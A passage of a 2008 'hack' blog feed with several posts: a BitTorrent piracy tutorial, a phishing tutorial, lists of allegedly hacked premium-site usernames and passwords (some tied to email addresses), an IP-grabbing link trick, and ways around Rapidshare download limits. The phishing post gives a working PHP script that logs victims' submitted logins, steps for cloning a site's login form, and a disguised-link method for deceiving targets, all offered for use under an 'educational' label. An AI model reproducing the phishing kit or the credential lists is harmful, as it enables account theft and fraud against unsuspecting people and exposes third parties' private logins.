ANYTHING.&lt;br /&gt;&lt;br /&gt;Install Azureus, and then in the installation folder, create 2 more folders. ./Plugins/suprnovalister (For example, if you installed Azureus to C:\PROGRAM FILES\AZUREUS, create C:\PROGRAM FILES\AZUREUS\PLUGINS\SUPRNOVALISTER). Next, put the suprnovalister.jar file that you downloaded, in that folder.&lt;br /&gt;&lt;br /&gt;Load up Azureus, and if you want, go through the settings and personalize it.&lt;br /&gt;&lt;br /&gt;The tab labeled "My Torrents" is the section of Azureus you need the most often. That lists all your transfers, uploads and downloads. It shows every bit of information you could possibly want to know about torrents you download.&lt;br /&gt;&lt;br /&gt;In the menu bar, go to View &gt; Plugins &gt; Suprnova Lister. This will open up a new tab in Azureus. Click on "Update Mirror". This will get a mirror site of suprnova.org containing all current torrent files available. Once a mirror is grabbed, choose a category from the drop-down box to the left and click "Update". Wah-lah, all the available downloads appear in the main chart above. Just double click a download you want, and bang its starting to download. Open the "My Torrents" tab again to view and make sure your download started.&lt;br /&gt;&lt;br /&gt;After your download has finished, be nice, and leave the torrent transferring. So people can get pieces of the file from you, just as you got pieces from other people.&lt;br /&gt;&lt;br /&gt;Alternatively, if you don't want to use the plugin... you can just head to suprnova.org and download files to any folder. Then go to File &gt; Open &gt; .torrent File in Azureus.&lt;br /&gt;&lt;br /&gt;This should about wrap it up for the Bit Torrent Tutorial. If you guys think of anything I should add, or whatnot, just let me know and I'll check into it. &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-6641010842942128132?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/6641010842942128132/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2008/12/bit-torrent-tutorial.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/6641010842942128132'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/6641010842942128132'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2008/12/bit-torrent-tutorial.html' title='Bit Torrent Tutorial'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-6451453477847586891</id><published>2008-12-30T00:51:00.000-08:00</published><updated>2009-01-03T04:57:49.659-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='phishing'/><category scheme='http://www.blogger.com/atom/ns#' term='tutorials'/><category scheme='http://www.blogger.com/atom/ns#' term='hack'/><title type='text'>"Phishing for Dummies "For Education</title><content type='html'>&lt;span class="smalltext"&gt;&lt;strong&gt;This is for educational purpose only.Downloaded from hackforums&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="smalltext"&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="smalltext"&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="smalltext"&gt;&lt;strong&gt;Phishing Tutorial (Very clear and good for newbs) &lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="post_body" id="pid_91435"&gt;The one Corw made on HF was very good, but some people had problems. This will be a basic tut on how to make a phisher! I will be using a variety of websites. Crow used myspace, but I will teach you how to make it with any!&lt;br /&gt;&lt;br /&gt;Index:&lt;br /&gt;What is a phisher? - 101&lt;br /&gt;Making a T35 Account - 102&lt;br /&gt;Getting Web pages Source Code - 103&lt;br /&gt;Creating Phish File - 104&lt;br /&gt;How to fool people - 105&lt;br /&gt;------------------------&lt;br /&gt;&lt;span style="FONT-WEIGHT: bold"&gt;What is a phisher?&lt;/span&gt; 101&lt;br /&gt;------------------------&lt;br /&gt;&lt;br /&gt;A phisher is a fake login page used to gain access to someones account. When someone logs into the fake login page, there password is sent to you.&lt;br /&gt;&lt;br /&gt;--------------------------&lt;br /&gt;&lt;span style="FONT-WEIGHT: bold"&gt;Making a T35 Account&lt;/span&gt; 102&lt;br /&gt;--------------------------&lt;br /&gt;&lt;br /&gt;In order to make a phisher, you need a web hosting site, I recommend T35. Sign up with a free acount and title it (websiteyourgonnaphish).t35.com For example: myspace.t35.com Most likeley, it is taken so add numbers like 08, or 07.&lt;br /&gt;&lt;br /&gt;--------------------------------------&lt;br /&gt;&lt;span style="FONT-WEIGHT: bold"&gt;Getting Web Pages Source Code&lt;/span&gt; 103&lt;br /&gt;--------------------------------------&lt;br /&gt;&lt;br /&gt;After you create that page, go to the website you will make a phisher for, I will use KHI ( &lt;a href="http://www.forums.khinsider.com/" target="_blank"&gt;http://www.forums.khinsider.com&lt;/a&gt; ) Make sure you are logged out and and attempt to post a message. You will get an error saying you must log-in. From tehre right-click the page, and click View Source. Copy and paste what has popped-up.&lt;br /&gt;&lt;br /&gt;------------------------&lt;br /&gt;&lt;span style="FONT-WEIGHT: bold"&gt;Creating Phish File&lt;/span&gt; 104&lt;br /&gt;------------------------&lt;br /&gt;&lt;br /&gt;Once you have that copied, go to your T35 account. Click on "New File" Title it &lt;span style="FONT-WEIGHT: bold"&gt;login.htm&lt;/span&gt; Then paste your Source Code you copied from 104. Save it.&lt;br /&gt;&lt;br /&gt;Now create another file, title it &lt;span style="FONT-WEIGHT: bold"&gt;fhish.php&lt;/span&gt; And inside, paste this code:&lt;br /&gt;&lt;br /&gt;&lt;div class="codeblock"&gt;&lt;div class="title"&gt;Code:&lt;br /&gt;&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code&gt;&lt;?php&lt;br /&gt;header("Location: http://www.myspace.com");&lt;br /&gt;$handle = fopen("thepasses.txt", "a");&lt;br /&gt;foreach($_GET as $variable =&gt; $value) {&lt;br /&gt;   fwrite($handle, $variable);&lt;br /&gt;   fwrite($handle, "=");&lt;br /&gt;   fwrite($handle, $value);&lt;br /&gt;   fwrite($handle, "\r\n");&lt;br /&gt;}&lt;br /&gt;fwrite($handle, "\r\n");&lt;br /&gt;fclose($handle);&lt;br /&gt;exit;&lt;br /&gt;?&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;The &lt;span style="FONT-WEIGHT: bold"&gt;http://www.myspace.com&lt;/span&gt; is what the page goes to after the victim logs in, change that to what desired&lt;br /&gt;&lt;br /&gt;Save the file.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Go back to your login.htm file and click edit. Press CTRL+F and type in &lt;span style="FONT-WEIGHT: bold"&gt;action=&lt;/span&gt; in the box. Keep pressing find until you find something that says &lt;span style="FONT-WEIGHT: bold"&gt;action=(something that has to do with logging in)&lt;/span&gt;. Replace that with fhish.php. Congratulations, you have a phisher!&lt;br /&gt;&lt;br /&gt;-------------------------&lt;br /&gt;How to fool people - 105&lt;br /&gt;-------------------------&lt;br /&gt;What you do now is disguise your link. Use this code:&lt;br /&gt;&lt;br /&gt;&lt;div class="codeblock"&gt;&lt;div class="title"&gt;Code:&lt;br /&gt;&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code&gt;T35acount.t35.com/login.htm&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;That is the link to your phishing page. When people login to that, you will get the password in a password.txt file that will be created when someone types something into it. But, you have to trick people. Use this code.&lt;br /&gt;&lt;div class="codeblock"&gt;&lt;div class="title"&gt;Code:&lt;br /&gt;&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code&gt;[url=xxx.t35.com]*real website name*.com/login.php[/url]&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;You do the same for any forum!&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-6451453477847586891?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/6451453477847586891/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2008/12/phishing-for-dummies-for-education.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/6451453477847586891'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/6451453477847586891'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2008/12/phishing-for-dummies-for-education.html' title='&quot;Phishing for Dummies &quot;For Education'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-7121373795227887845</id><published>2008-12-28T06:18:00.000-08:00</published><updated>2009-01-03T04:57:28.522-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Premium accounts'/><category scheme='http://www.blogger.com/atom/ns#' term='hack'/><title type='text'>Some hacked premium accounts</title><content type='html'>http://gamedownloadnow.com&lt;br /&gt;Your username is: ga20me&lt;br /&gt;Your password is: ke01feb&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;www.divxcrawler.com account&lt;br /&gt;Username: divx273&lt;br /&gt;Password : 8342729&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;www.unlimitedgamedownloads.com&lt;br /&gt;User Name : ga20me&lt;br /&gt;Password : ke01feb&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://suprnova.com/login.php&lt;br /&gt;Username: mpuv3y&lt;br /&gt;Password: umvpy3x&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://www.fulldownloads.us&lt;br /&gt;Username-Af872HskL&lt;br /&gt;Password- XjsdH28N&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;www.pirateaccess.com&lt;br /&gt;Username-NUO9UH&lt;br /&gt;Password-kXpEYF&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://tvadvanced.com/login.asp&lt;br /&gt;Your username is: mv03dl&lt;br /&gt;Your password is: frmvdl&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://www.pirateaccess.com FREE ACCOUNTS&lt;br /&gt;&lt;br /&gt;account h4gpOM&lt;br /&gt;password Ca0i25&lt;br /&gt;&lt;br /&gt;account e2ZTjs&lt;br /&gt;password zqObNO&lt;br /&gt;&lt;br /&gt;account gC7mtB&lt;br /&gt;password CXGB40&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.downloadprofessional.com/" target="_blank"&gt;www.downloadprofessional.com&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Username: lo886Ees&lt;br /&gt;Password: zAgt88er&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.warezquality.com/" target="_blank"&gt;www.warezquality.com&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Username: ageg2020&lt;br /&gt;Password: z8fsDfg3&lt;br /&gt;Njoy!!!!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-7121373795227887845?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/7121373795227887845/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2008/12/some-hacked-premium-accounts.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/7121373795227887845'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/7121373795227887845'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2008/12/some-hacked-premium-accounts.html' title='Some hacked premium accounts'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-4989366430900542967</id><published>2008-12-26T04:31:00.000-08:00</published><updated>2009-01-03T04:59:01.528-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='rapidshare'/><category scheme='http://www.blogger.com/atom/ns#' term='tips and tricks'/><category scheme='http://www.blogger.com/atom/ns#' term='Premium accounts'/><category scheme='http://www.blogger.com/atom/ns#' term='hack'/><title type='text'>Simple way to hack RapidShare Premium account</title><content type='html'>This is my first tutorial guys, written by my own hand!!! ^_^&lt;br /&gt;&lt;br /&gt;Anyways it's on how to "Hack" Rapidshare to get Premium links!&lt;br /&gt;&lt;br /&gt;Dont Forget Guys this is my first tut!!!...so take it easy on me...lol!!!&lt;br /&gt;&lt;br /&gt;Here it is...Hope you enjoy!!!&lt;br /&gt;&lt;br /&gt;Files needed!&lt;br /&gt;&lt;br /&gt;- Firefox! (Download it at &lt;a href="http://www.firefox.com/" target="_blank"&gt;http://www.firefox.com&lt;/a&gt;)&lt;br /&gt;&lt;br /&gt;- Then you will need a firefox addon called Greasemonkey! it's a great addon!&lt;br /&gt;(Download it here: &lt;a href="https://addons.mozilla.org/en-US/firefox/downloads/file/16465/greasemonkey-0.7.20070607.0-fx.xpi%29" target="_blank"&gt;https://addons.mozilla.org/en-US/firefox/downloads/file/16465/greasemonkey-0.7.20070607.0-fx.xpi)&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;- Then you will need a special script for Greasemonkey (Download it here: &lt;a href="http://rs262.rapidshare.com/files/76969319/firefoxuser.rar%29" target="_blank"&gt;http://rs262.rapidshare.com/files/76969319/firefoxuser.rar)&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Step 1: Download and install firefox!...lol...pretty easy!&lt;br /&gt;&lt;br /&gt;Step 2: Head over to the Greasemonkey link and install it!&lt;br /&gt;&lt;br /&gt;Step 3: Restart Firefox! and install the special script by simply dragging the script file into firefox!&lt;br /&gt;&lt;br /&gt;Now when you go to Rapidshare!!! Everything will be different and there will be some instructions on how to download with the links!!!&lt;br /&gt;&lt;br /&gt;Hope this helps!!!....lol...dont forget this is my first tut!!! ^_^&lt;br /&gt;&lt;br /&gt;Bye!!! Chaos_Chicken!!!&lt;br /&gt;from hackforums&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-4989366430900542967?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/4989366430900542967/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2008/12/simple-way-to-hack-rapidshare-premium.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/4989366430900542967'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/4989366430900542967'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2008/12/simple-way-to-hack-rapidshare-premium.html' title='Simple way to hack RapidShare Premium account'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-1194339069873796213</id><published>2008-12-25T01:36:00.001-08:00</published><updated>2009-01-03T05:01:18.917-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='IP'/><category scheme='http://www.blogger.com/atom/ns#' term='hack'/><title type='text'>Know my IP?</title><content type='html'>&lt;span class="smalltext"&gt;&lt;strong&gt;get anybodys ip easy and quick with just a link &lt;/strong&gt;&lt;/span&gt;&lt;div class="post_body" id="pid_334458"&gt;below i give a way to obtain your friends or whatever person u want IP&lt;br /&gt;with just sending him a link to visit&lt;br /&gt;&lt;br /&gt;&lt;div class="codeblock"&gt;&lt;div class="title"&gt;Code:&lt;br /&gt;&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code&gt;http://rpgcrime.com/send.swf?msg=themaintextoftheflashfilegoeshere&amp;amp;email=xxxxxxxxxxx&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;where:xxxxxxxxxx (insert ur mail)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;just send him the link and the IP will come to ur e-mail inbox...&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;from hackforums&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-1194339069873796213?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/1194339069873796213/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2008/12/know-my-ip.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/1194339069873796213'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/1194339069873796213'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2008/12/know-my-ip.html' title='Know my IP?'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-3564708256356496489</id><published>2008-12-25T01:36:00.000-08:00</published><updated>2009-01-03T05:08:02.917-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='upload download'/><category scheme='http://www.blogger.com/atom/ns#' term='tips and tricks'/><category scheme='http://www.blogger.com/atom/ns#' term='hack'/><title type='text'>Free Premium Accounts for downloading</title><content type='html'>&lt;p&gt;&lt;span class="threadText" id="textNode_11301868"&gt;Following are the list of usernames and passwords of the premium accounts for Best downloads sites.&lt;br /&gt;…!! ENJOY !!…&lt;br /&gt;!!…100% Working Accounts…!!&lt;/span&gt;&lt;/p&gt;&lt;p&gt;1.) www.divxcrawler.com {download movies fastly}&lt;/p&gt;&lt;p&gt;Username : divx273&lt;br /&gt;Password : 8342729&lt;/p&gt;&lt;p&gt;2.) www.butterflydownloadnetwork.com {movies, music, Pc Games, Tv shows}&lt;/p&gt;&lt;p&gt;Username : cinemanetwork20&lt;br /&gt;Password : butterfly20&lt;/p&gt;&lt;p&gt;3.) www.downloadprofessional.com {movies,Pc softwares, Pc Games, Tv shows}&lt;/p&gt;&lt;p&gt;Username : lo886Ees&lt;br /&gt;Password : zAgt88er&lt;/p&gt;&lt;p&gt;4.) www.sharingzone.net {movies, Pc softwares, Pc Games}&lt;/p&gt;&lt;p&gt;Username : LODMQYHX&lt;br /&gt;Password : 375021402&lt;br /&gt;Receipt : 4T5W89RD&lt;/p&gt;&lt;p&gt;5.) www.unlimitedgamedownloads.com {movies, Pc Games, psp softwares}&lt;/p&gt;&lt;p&gt;Username : ga20me&lt;br /&gt;Password : ke01feb&lt;/p&gt;&lt;p&gt;6.) www.watchdirect.tv {movies, music, Pc Games, online Tv}&lt;/p&gt;&lt;p&gt;Username : cinemanetwork20&lt;br /&gt;Password : butterfly20&lt;/p&gt;&lt;p&gt;7.) www.fullreleasez.com {Greatly Every thing}&lt;/p&gt;&lt;p&gt;Username : Af872HskL&lt;br /&gt;Password : XjsdH28N&lt;/p&gt;&lt;p&gt;8.) www.fulldownloads.us {Greatly Every thing}&lt;/p&gt;&lt;p&gt;Username : Af872HskL&lt;br /&gt;Password : XjsdH28N&lt;/p&gt;&lt;p&gt;9.) www.pirateaccess.com {Every thing}&lt;/p&gt;&lt;p&gt;Username : yourfrienddalat@gmail.com&lt;br /&gt;Password : CHh5LKPI&lt;/p&gt;&lt;p&gt;Username : xxx_heel_xxx@yahoo.com&lt;br /&gt;Password : MJY0BUY&lt;/p&gt;&lt;p&gt;Username : i_l0ve_u_786@yahoo.com&lt;br /&gt;Password : rYvLgPrt&lt;/p&gt;&lt;p&gt;Username : mubashar_siddique@yahoo.com&lt;br /&gt;Password : F9Gzgwb5&lt;/p&gt;&lt;p&gt;10.) www.warezquality.com {Every thing}&lt;/p&gt;&lt;p&gt;Username : ageg2020&lt;br /&gt;Password : z8fsDfg3&lt;/p&gt;&lt;p&gt;&lt;span class="threadText" id="textNode_11301849"&gt;11.) wwww.warezreleases.com {All Stuff}&lt;/span&gt;&lt;/p&gt;&lt;p&gt;Username : HnRPxKQz&lt;br /&gt;Password : a59KBV7&lt;/p&gt;&lt;p&gt;Username : a25bipZP&lt;br /&gt;Password : 1TeVnoJb&lt;/p&gt;&lt;p&gt;Username : SHYyJfWU&lt;br /&gt;Password : P4K20uO&lt;/p&gt;&lt;p&gt;12.) www.fulldownloadaccess.com {All Stuff}&lt;/p&gt;&lt;p&gt;Username : mpuv3y&lt;br /&gt;Password : umvpy3x&lt;/p&gt;&lt;p&gt;13.) www.alphaload.com {All Stuff}&lt;/p&gt;&lt;p&gt;Username : AL3429352&lt;br /&gt;Password : ykbcKTNS&lt;/p&gt;&lt;p&gt;Username : AL3429355&lt;br /&gt;Password : RCHAbhKM&lt;/p&gt;&lt;p&gt;Username : AL3429350&lt;br /&gt;Password : gMZNFcyS&lt;/p&gt;&lt;p&gt;Username : AL3429351&lt;br /&gt;Password : cTAkWAxc&lt;/p&gt;&lt;p&gt;Username : AL3429352&lt;br /&gt;Password : ykbcKTNS&lt;/p&gt;&lt;p&gt;14) www.gamedownloadnow.com {All Stuff}&lt;/p&gt;&lt;p&gt;Username : ga20me&lt;br /&gt;Password : ke01feb&lt;/p&gt;&lt;p&gt;15.) www.unlimiteddownloadcenter.com {All Stuff}&lt;/p&gt;&lt;p&gt;Username : cu20me&lt;br /&gt;Password : ke01feb&lt;/p&gt;&lt;p&gt;16.) www.tvadvanced.com {online Tv}&lt;/p&gt;&lt;p&gt;Username : mv03dl&lt;br /&gt;Password : frmvdl&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-3564708256356496489?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/3564708256356496489/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2008/12/free-premium-accounts-for-downloading.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/3564708256356496489'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/3564708256356496489'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2008/12/free-premium-accounts-for-downloading.html' title='Free Premium Accounts for downloading'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-6248830149172159032</id><published>2008-12-25T01:29:00.000-08:00</published><updated>2009-01-03T05:02:23.408-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='rapidshare'/><category scheme='http://www.blogger.com/atom/ns#' term='tips and tricks'/><category scheme='http://www.blogger.com/atom/ns#' term='Learning'/><category scheme='http://www.blogger.com/atom/ns#' term='hack'/><title type='text'>Hacks to beat Rapidshare(Advanced)</title><content type='html'>&lt;p style="TEXT-ALIGN: justify"&gt;We all know that getting a new IP address from ISP allows us to download the next file from RapidShare. I bet many of us know this concept long ago but there wasn’t any program that can do this. Now, here is a program called Cryptload that is able to download the first file automatically without you entering the CAPTCHA code, and when it finished downloading, it will try to download the second file. Once it detects “You have reached the download-limit for free-users” message from RapidShare, it’ll disconnect and reconnect your Internet to get a new IP address. Then it’ll continue downloading the second file. All this is done automatically and you only need to add the RapidShare links to Cryptload. How easy is that?&lt;/p&gt;&lt;p style="TEXT-ALIGN: justify"&gt;But before you get to automate RapidShare downloading, I’ll show you what you need to do because I was stuck for a few days on Cryptload with some problems. &lt;img title="Cryptload options button" alt="Cryptload options button" src="http://www.raymond.cc/images/cryptload-options-button.png" align="right" /&gt;Most important setting that you must get it right is the Router section. Other than that, there is nothing else you need to configure in Cryptload. You can access Cryptload options by clicking the top right button that looks like this. Click on the Router button to configure your router settings. If you are using a modem to connect to the internet, select the Modem button. How do you know if you’re using a modem or router? If you need to dial up to the &lt;a class="kLink" id="KonaLink1" style="POSITION: static; TEXT-DECORATION: underline! important" href="http://www.hungry-hackers.com/2008/06/advanced-rapidshare-hacking.html#" target="undefined"&gt;&lt;span style="FONT-WEIGHT: 400; FONT-SIZE: 12px; COLOR: rgb(248,148,29)! important; FONT-FAMILY: Arial,Helvetica; POSITION: staticcolor:#f8941d;" &gt;&lt;span class="kLink" style="FONT-WEIGHT: 400; FONT-SIZE: 12px; COLOR: rgb(248,148,29)! important; BORDER-BOTTOM: rgb(248,148,29) 1px solid; FONT-FAMILY: Arial,Helvetica; POSITION: static; BACKGROUND-COLOR: transparent"&gt;Internet&lt;/span&gt;&lt;/span&gt;&lt;/a&gt; like the below image, then you’re using a modem.&lt;/p&gt;&lt;p style="TEXT-ALIGN: justify"&gt;&lt;img title="Advanced Rapidshare Hacking - The Ethical Hacking" height="367" alt="Advanced Rapidshare Hacking - The Ethical Hacking" src="http://image.wetpaint.com/image/3/_bJItERGkPO2_6cLlE5StA21968/GW350H367" width="350" align="bottom" /&gt;&lt;/p&gt;&lt;p style="TEXT-ALIGN: justify"&gt;If your internet automatically when you turn on the power for the small box, then it’s a router. So if you are using a router, click on the dropbox and search for your router model in the list.&lt;/p&gt;&lt;p style="TEXT-ALIGN: justify"&gt;&lt;img title="Advanced Rapidshare Hacking - The Ethical Hacking" alt="Advanced Rapidshare Hacking - The Ethical Hacking" src="http://image.wetpaint.com/image/3/cXDO3N7EEMxXpdfvwbYCmg13432" align="bottom" /&gt;&lt;/p&gt;&lt;p style="TEXT-ALIGN: justify"&gt;Here are the settings you must configure correctly.&lt;/p&gt;&lt;p style="TEXT-ALIGN: justify"&gt;&lt;strong&gt;IP Address:&lt;/strong&gt; The IP Address of your router. To know your router’s IP address, run command prompt, type ipconfig and the Default Gateway is your router’s IP address.&lt;br /&gt;&lt;strong&gt;Username and Password:&lt;/strong&gt; The username and password used to login to your router. Please check your router’s manual if you don’t know the default login data.&lt;br /&gt;&lt;strong&gt;Waittime after reconnect in sec:&lt;/strong&gt; This is the time that it’ll wait to download the next RapidShare file after Cryptload tries to reconnect to the Internet. It depends on your ISP. Some might take longer to reconnect. Try 15 seconds first and if your Internet doesn’t gets connected before 15 seconds, increase it to 30 seconds and so on…&lt;/p&gt;&lt;p style="TEXT-ALIGN: justify"&gt;Now you can use Cryptload to automate RapidShare downloading. Here is how I do it.&lt;/p&gt;&lt;p style="TEXT-ALIGN: justify"&gt;1. Collect all RapidShare links that I want to download and paste them into a text file.&lt;br /&gt;2. Run Cryptload&lt;br /&gt;3. On the text file, press CTRL+A to select all, and then press CTRL+C. Link collector will appear and it will automatically decrypt the links.&lt;br /&gt;4. Press Add button and press OK at Package settings. You can change the downloaded files location if you want.&lt;/p&gt;&lt;p style="TEXT-ALIGN: justify"&gt;What if your router’s model is not in the list?&lt;/p&gt;&lt;p style="TEXT-ALIGN: justify"&gt;Not to worry at all because the people who created Cryptload are very nice people and they are very willing to help you to create CLR file to support your router. Here’s what you need to do.&lt;/p&gt;&lt;p style="TEXT-ALIGN: justify"&gt;1.&lt;a href="http://rahulhackingarticles.wetpaint.com/" target="_self"&gt; &lt;/a&gt;&lt;a href="http://rahulhackingarticles.wetpaint.com/" target="_self"&gt;Install Live HTTP Headers&lt;/a&gt;&lt;a href="http://rahulhackingarticles.wetpaint.com/" target="_self"&gt; &lt;/a&gt;extension for your Firefox browser.&lt;br /&gt;2. Run Firefox, go to Tools -&gt; Live HTTP Headers. Make sure capture checkbox is checked.&lt;br /&gt;3. Go to Firefox window, login to your router, manually disconnect and then reconnect to the internet.&lt;br /&gt;4. Go back to the Live HTTP headers, click Save all button and save it as router.txt&lt;br /&gt;5. Click close to close Live HTTP headers.&lt;br /&gt;6. Go to &lt;a class="external" href="http://www.nopaste.com/" target="_blank" rel="nofollow"&gt;www.nopaste.com&lt;/a&gt;, enter your name in Nick, Description as your router brand with model and firmware version if possible. Make sure Plain is selected for language. Click on the Browse button and look for the router.txt file. Finally click Paste.&lt;br /&gt;7. Wait for a few seconds, and you’ll be forwarded to a new page with the URL something like http://nopaste.com/p/xXXxxXxxX.&lt;br /&gt;8. Go to www.cryptload.info website, at Live-Support, enter your username (your name), E-mail and click Los button. If cryptload staff is available, you can give them the nopaste URL to create your router’s CLR file. If not, you can fill up the form to send an email to them. I am sure they’ll get back to you with your CLR file.&lt;/p&gt;&lt;p style="TEXT-ALIGN: justify"&gt;Another way is to join Cryptload IRC channel and try 